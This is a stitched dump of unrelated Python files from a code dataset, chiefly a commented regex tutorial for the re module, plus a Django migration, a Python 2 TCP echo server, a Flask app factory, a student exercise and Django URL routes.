re.findall('\b', 'testb') # without r flag , the backslash gets consumed by the python string interpreter and '\b' is converted to the ASCII backspace character. re module gets backspace.
#[]
re.findall('\\b', 'test') # backslash is explicitly escaped and is passed through to re module
#['', '']
re.findall(r'\b', 'test') # often this syntax is easier
#['', '']
'''
Search for pattern 'iii' in string 'piiig'.
On success, result.group() is resulted text.
# result[0] - the whole string
# result[1] - first group
# result[2] - second group and so on
'''
result = re.search(r'iii', 'piiig') # found, result.group() == "iii"
result = re.search(r'igs', 'piiig') # not found, result == None
if result != None:
result[0]
'''
\b Returns a match where the specified characters are at the beginning or at the end of a word
(the "r" in the beginning is making sure that the string is being treated as a "raw string")
r"\bain"
r"ain\b"
'''
result = re.search(r'\bain', 'it is aining asas') # found,'ain
result[0]
#if r flag is not used, \b is treated as a backspace
result = re.search('\bain', 'it is aining') # not found
## . = any single char but \n, so ... means 3 chars must result
result = re.search(r'..g', 'p1kgx') # found, result.group() == "1kg"
## \d = digit char,
# \w = alphanumeric and _ [a-zA-Z0-9_]
# In example below, 3 digits and 3 chars must result
result = re.search(r'\d\d\d', 'p123g') # found, result.group() == "123"
result = re.search(r'\w\w\w', '@@ab_1d!!') # found, result.group() == "ab1"
type(result)
result[0]
''' Repeatition
Things get more interesting when you use + and * to specify repetition in the pattern
+ -- 1 or more occurrences of the pattern to its left, e.g. 'i+' = one or more i's
* -- 0 or more occurrences of the pattern to its left
? -- result 0 or 1 occurrences of the pattern to its left
Leftmost & Largest
'''
## i+ = one or more i's, as many as possible.
result = re.search(r'pi+', 'piiig') # found, result.group() == "piii"
## Finds the first/leftmost solution, and within it drives the +
## as far as possible (aka 'leftmost and largest').
## In this example, note that it does not get to the second set of i's.
result = re.search(r'i+', 'piigiiii') # found, result.group() == "ii"
## \s* = zero or more whitespace chars
## Here look for 3 digits, possibly separated by whitespace.
result = re.search(r'\d\s*\d\s*\d', 'xx1 2 3xx') # found, result.group() == "1 2 3"
result = re.search(r'\d\s*\d\s*\d', 'xx12 3xx') # found, result.group() == "12 3"
result = re.search(r'\d\s*\d\s*\d', 'xx123xx') # found, result.group() == "123"
## ^ = results the start of string, so this fails:
result = re.search(r'^b\w+', 'foobar') # not found, result == None
## but without the ^ it succeeds:
result = re.search(r'b\w+', 'foobar') # found, result.group() == "bar"
## ? = 0 or 1 occurance
result = re.search(r'ssa?', 'ssa') # found, result.group() == "ssa"
result = re.search(r'ssa?', 'sdf') # not found
result = re.search(r'ssa?', 'ssdf') # found, result.group() == "ss"
#escape a special char e.g. \.
# @ does not need to be escaped. However if escaped , it does not make a difference and the result is the same
#square brackets
'''
Square brackets can be used to indicate a set of chars, so [abc] resultes 'a' or 'b' or 'c'.
The codes \w, \s etc. work inside square brackets too.
In sets, +, *, ., |, (), $,{} has no special meaning, so
[+] means: return a match for any '+' character in the string
dot (.) just means a literal dot.
For the emails problem, the square brackets are an easy way to add '.' and '-' to the set of chars which can appear around the @ with the pattern r'[\w.-]+@[\w.-]+'
\=
'''
result = re.search(r'[\w.-]+\@1[2-9]+', 'x@1122') # not found
result = re.search(r'[\w.-]+\@1[2-9]+', 'x@122') # found: x@122
result = re.search(r'[\w.-]+\@[\w-]+\.[\w]+', 'mukesh_khattar.k@swd-edc.com') # found: mukesh_khattar.k@swd-edc.com
# Inside a set, ^ in a set means exclude. In a normal use (r'^str' ) means starting with
# example - [^arn] Returns a match for any character EXCEPT a, r, and n
result = re.search(r'[^arn]', 'rit is aining')
result[0] # i
# escape [] if it is patterns e.g. if we need '[process id]' in the line below
line ='sqxwc wecwec[12121] xwcwecc'
result=re.search(r'\[\d+\]',line)
# print the result using one of the following
result.group(0) # '[12121]'
result[0] # '12121'
#in abobe if just process_id is needed
line ='sqxwc wecwec[12121] xwcwecc'
result=re.search(r'\[(\d+)\]',line)
result[0] # '[12121]'
result[1] # '12121'
#[a-zA-Z] - one char of a-z or A_Z
# ^ ; start of string
result = re.search(r'^[a-zA-Z][\w._-]+\@[\w_-]+\.[\w]+', 'mukesh_khattar.k@swd-edc.com') # found: mukesh_khattar.k@swd-edc.com
result = re.search(r'^[a-zA-Z][\w._-]+\@[\w_-]+\.[\w]+', '1mukesh_khattar.k@swd-edc.com') # not found
# '-' need to be escaped in set. + and . lose its special meaning when used isnide a set
pattern = '[\w\-+.]+\.[a-zA-Z]+'
result=re.search(pattern, 'a_b-c+d.wdwd.com')
result[0]
# the hour is between 1 and 12, with no leading zero, followed by a colon, then minutes between 00 and 59, then an optional space, and then AM or PM, in upper or lower case.
pattern = '([1]?[0-9]):([0-5][0-9])( ?)[AaPp][Mm]'
result = re.search(pattern, '2:29 PM')
result[0]
result[1]
result[2]
result[3]
result[4] # error
# OR condition use | . eg. first char needs to be upper char or digit AND two or more chars AND surrounded by ()
pattern = '\(([A-Z]|[0-9])[\w]+\)'
result = re.search(pattern, "wdwd(1aM)wdw") # True
result = re.search(pattern, "wdwd(AM)wdw") # True
result = re.search(pattern, "wdwd(aswd)wdw") # False
# ^- start of string , $ - end of string
#the text passed qualifies as a top-level web address, meaning that it contains alphanumeric characters (which includes
# letters, numbers, and underscores), as well as periods, dashes, and a plus sign,
# followed by a period and a character-only top-level domain such as ".com", ".info", ".edu", et
pattern = '^([\w\-+\.]+)\/([a-zA-Z]+)$'
result = re.search(pattern, "web-addres.com/homepage") # True
result[0]
'''
group Extraction
Group result e.g. for email address (username_pattern)@(host_pattern)
The "group" feature of a regular expression allows you to pick out parts of the resulting text.
'''
str = 'purple alice-b@google.com monkey dishwasher'
result = re.search(r'([\w.-]+)@([\w.-]+)', str)
result[0] ## 'alice-b@google.com' (the whole result)
#extract groups, eq:
result[1] #'alice-b' (the username, group 1)
# eq:
result[2] ## 'google.com' (the host, group 2)
# pattern to find ln, fn where fn should include
# '-' does not need to be escaped if it is first or last char in set
name = 'last-name, firstname M.'
result = re.search(r'^([\w\s-]+), ([\w\s\.]+)$', name)
result[0]
result[1]
result[2]
# exact specified number of instances
zip='here it is 12121'
result = re.search(r'\d{5}', zip)
result[0] # '12121'
zip='as 1212 ss'
result = re.search(r'\d{5}', zip)
result[0] # None
# exactly 5 digits, and sometimes, but not always, followed by a dash with 4 more digits.
# The zip code needs to be preceded by at least one space, and cannot be at the start of the text.
#pattern = '(\w)+(\s)+[0-9][0-9][0-9][0-9][0-9](([-][0-9][0-9][0-9][0-9])|(\s))'
pattern = '(\w)+(\s)+[0-9]{5}(([-][0-9]{4})|(\s))'
result = re.search(pattern, "a 21212-0991 wdw") # True
result[0]
result = re.search(pattern, "a 21212 wdw") # True
result[0]
result = re.search(pattern, "a 2122 wdw") # False
if result:
result[0]
'''
findall() is probably the single most powerful function in the re module.
Above we used re.search() to find the first result for a pattern.
findall() finds *all* the resultes and returns them as a list of strings, with each string representing one result.
'''
str = 'purple alice@google.com, blah monkey bob@abc.com blah dishwasher'
## Here re.findall() returns a list of all the found email strings
emails = re.findall(r'[\w\.-]+@[\w\.-]+', str) ## ['alice@google.com', 'bob@abc.com']
for email in emails:
# do something with each found email string
print (email)
# findall and groups
str = 'purple alice@google.com, blah monkey bob@abc.com blah dishwasher'
tuples = re.findall(r'([\w\.-]+)@([\w\.-]+)', str)
print (tuples) ## [('alice', 'google.com'), ('bob', 'abc.com')]
for tuple in tuples:
tuple
print (tuple[0]) ## username
print (tuple[1]) ## host
'''
findall() with files
example below extracts IP addresses from apache file
'''
# Open file
f = open('/Users/mukeshkhattar/github_public_repos/examples/Common Data Formats/apache_logs/apache_logs', 'r')
# Feed the file text into findall(); it returns a list of all the found strings
strings = re.findall(r'[\d]+\.[\d]+\.[\d]+\.[\d]', f.read())
print(strings)
#subtir=tution
# this code updates emailaddresses with domain name
str = 'purple alice@google.com, blah monkey bob@abc.com blah dishwasher'
## re.sub(pat, replacement, str) -- returns new string with all replacements,
## purple alice@yo-yo-dyne.com, blah monkey bob@yo-yo-dyne.com blah dishwasher
#method:1
## \1 is group(1), \2 group(2) in the replacement
result=re.sub(r'([\w\.-]+)@([\w\.-]+)', r'\1@yo-yo-dyne.com', str)
result
str
#method:2
print (re.sub(r'@[\w\.-]+', r'@yo-yo-dyne.com', str))
# The split() function returns a list where the string has been split at each match:
#split at each whitespace:
txt = "The rain in Spain"
x = re.split("\s", txt)
x # ['The', 'rain', 'in', 'Spain']
#split with maxsplit parameter
#split at first whitespace occurance
txt = "The rain in Spain"
x = re.split("\s", txt, 1)
x # ['The', 'rain in Spain']
# substitute function
# replace whitespace with 9
txt = "The rain in Spain"
x = re.sub("\s", "9", txt) # 'The9rain9in9Spain'
x
# You can control the number of replacements by specifying the count parameter:
txt = "The rain in Spain"
x = re.sub("\s", "9",txt,2)
x # 'The9rain9in Spain'
|
23,194 | 712fead0f865182fe8d1ef97dd3c0428212cc05e | # Generated by Django 3.2.4 on 2021-07-06 02:05
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Product',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('productName', models.CharField(max_length=100)),
('productQuantity', models.CharField(max_length=10)),
('stock', models.IntegerField()),
('price', models.FloatField(max_length=100)),
('image', models.ImageField(upload_to='images/')),
],
),
]
|
23,195 | 759fa31d4e859de60779b684c79dbcd7db2f2167 | import SocketServer
import struct
from lib.tcpmessage import TCPMessage
class EchoServer(SocketServer.BaseRequestHandler):
def handle(self):
# Try to get the message length (2 bytes)
len_buf = self.read(self.request, 2)
msg_len = struct.unpack("!H", len_buf)[0]
data = self.read(self.request, msg_len).strip()
m = TCPMessage()
m.decode(data)
print m
def read(self, socket, length):
buf = ""
while length > 0:
data = socket.recv(length)
if data == "":
raise RuntimeError("Connection closed!")
buf += data
length -= len(data)
return buf
if __name__ == "__main__":
server = SocketServer.TCPServer(("localhost", 5200), EchoServer)
server.serve_forever()
|
23,196 | 29a7a9f8585519d248c11d75855f397b2383a937 | ii = [('LyelCPG2.py', 2), ('MarrFDI.py', 1), ('GodwWSL2.py', 1), ('CookGHP.py', 1), ('ChalTPW2.py', 1), ('LyelCPG.py', 2), ('DibdTRL2.py', 2), ('WadeJEB.py', 1), ('WilbRLW3.py', 1), ('MereHHB2.py', 1)] |
23,197 | 6ff62b4896c11c8114cca7faab214f080f040083 | import os
from flask import Flask
from dotenv import load_dotenv
def create_app():
dotenv_path = os.path.join(os.path.dirname(__file__), '..', '.env')
load_dotenv(dotenv_path)
app = Flask(__name__, template_folder='templates')
app.config['CSRF_SESSION_KEY'] = os.environ.get('CSRF_SESSION_KEY')
app.config['SECRET_KEY'] = os.environ.get('SECRET_KEY')
from app.controllers import app as app_module
app.register_blueprint(app_module)
return app
|
23,198 | f5dc2354f87ce84e6510a8546a27be597d821cb1 | # coding: utf-8
# Aluno: Héricles Emanuel
# Matrícula: 117110647
# Atividade: Palavras com Letras Dobradas
num_palavras = int(raw_input())
list_dobrada = []
list_nao_dobrada = []
for i in range(0, num_palavras):
dobradas = 0
palavra = raw_input()
for letra in range(0, len(palavra) - 1):
if palavra[letra] == palavra [letra + 1]:
dobradas += 1
break
if dobradas > 0:
list_dobrada.append(palavra)
else:
list_nao_dobrada.append(palavra)
print "%i palavra(s) com letras dobradas:" % len(list_dobrada)
for i in range(0, len(list_dobrada)):
print list_dobrada[i]
print "---"
print "%i palavra(s) sem letras dobradas:" % len(list_nao_dobrada)
for i in range(0, len(list_nao_dobrada)):
print list_nao_dobrada[i]
|
23,199 | 1e2d1d24ba98b38d5cc760a5d368419be33bf030 | from django.urls import path,include
from hotel_app import views
urlpatterns =[
path('',views.BaseView.as_view(),name='base'),
path('home/',views.IndexView.as_view(),name='index'),
path('register/',views.register,name='register'),
path('user_login/',views.user_login,name='user_login'),
path('advance_booking/',views.advance_booking,name='advance_booking'),
path('about/',views.about,name='about'),
path('thank/',views.thank,name = 'thank'),
path('room_terrif/',views.room_terrif,name='room_terrif'),
path('other/',views.other,name='other'),
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.